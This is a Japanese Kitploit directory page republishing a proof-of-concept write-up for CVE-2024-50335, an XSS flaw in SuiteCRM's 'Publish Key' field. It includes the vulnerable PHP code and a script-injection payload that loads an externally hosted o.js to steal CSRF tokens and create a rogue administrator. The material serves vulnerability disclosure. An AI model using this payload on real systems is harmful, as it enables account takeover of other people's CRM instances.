Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-50335 — SuiteCRMのセキュリティ脆弱性で、CSRFトークンを窃取し、適切な認証なしに新しい管理ユーザーを作成するなどの不正な操作を実行するために悪用される可能性があります。 | Kitploit
ツール/GitHubGitHub/shellkraft/cve-2024-50335
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

SuiteCRMのセキュリティ脆弱性で、CSRFトークンを窃取し、適切な認証なしに新しい管理ユーザーを作成するなどの不正な操作を実行するために悪用される可能性があります。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-50335: 「Publish Key」フィールドにおける認証済みXSSにより、不正な管理者ユーザーの作成が可能

概要

SuiteCRMのEdit Profileページにある「Publish Key」フィールドは、反射型クロスサイトスクリプティング (XSS) に対して脆弱であり、攻撃者が悪意のあるJavaScriptコードを注入できる可能性があります。これを悪用すると、CSRFトークンを窃取し、適切な認証なしに新しい管理者ユーザーを作成するなどの不正な操作を実行できます。


詳細

この脆弱性は、SuiteCRMアプリケーション内のPublish Keyフィールドに対する入力検証とサニタイズが不十分であるために発生します。攻撃者が悪意のあるスクリプトを注入すると、認証済みユーザーのセッションのコンテキスト内でそれが実行されます。注入されたスクリプト (o.js) は、取得したCSRFトークンを利用して新しい管理者ユーザーを作成するリクエストを偽造し、CRMインスタンスの整合性とセキュリティを実質的に損ないます。


影響

この脆弱性は、クリティカルなクロスサイトスクリプティング (XSS) の問題です。その影響は次のとおりです。

  1. 不正な管理者アクセス: 攻撃者は新しい管理者ユーザーを作成でき、CRMインスタンスを完全に制御できる可能性があります。
  2. CSRFトークンの窃取: 認証済みユーザーに代わって不正な操作が実行される可能性があります。
  3. データ整合性の侵害: ユーザーアカウントや設定を操作できるため、データの喪失、漏えい、または不正な変更につながる可能性があります。

脆弱なPHPソースコード

root@kitploit:~
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

PoC

  1. 有効な管理者資格情報を使用してSuiteCRMにログインします。
  2. Edit Profileに移動: 管理者アカウントのEdit Profileページにアクセスします。
  3. 「Advanced」タブの「Publish Key」フィールドに、次のスクリプトを注入します:
root@kitploit:~
<script src=//localhost:1235/o.js>
  1. o.jsがポート1235のlocalhost上のサーバーでホストされ、提供されたJavaScriptコードスニペットに記載されているエクスプロイトコードを配信していることを確認します。
  2. 管理者プロファイルへの変更を保存します。
  3. SuiteCRMページを再読み込みすると、悪意のあるo.jsスクリプトが実行され、CSRFトークンを窃取して、以下の資格情報を持つ新しい管理者ユーザーを作成します。
root@kitploit:~
Username - imposter
Password - ok
  1. 新しく作成された管理者ユーザーの資格情報でログインし、悪用が成功したことを確認します。

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


参照

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
ツールをダウンロード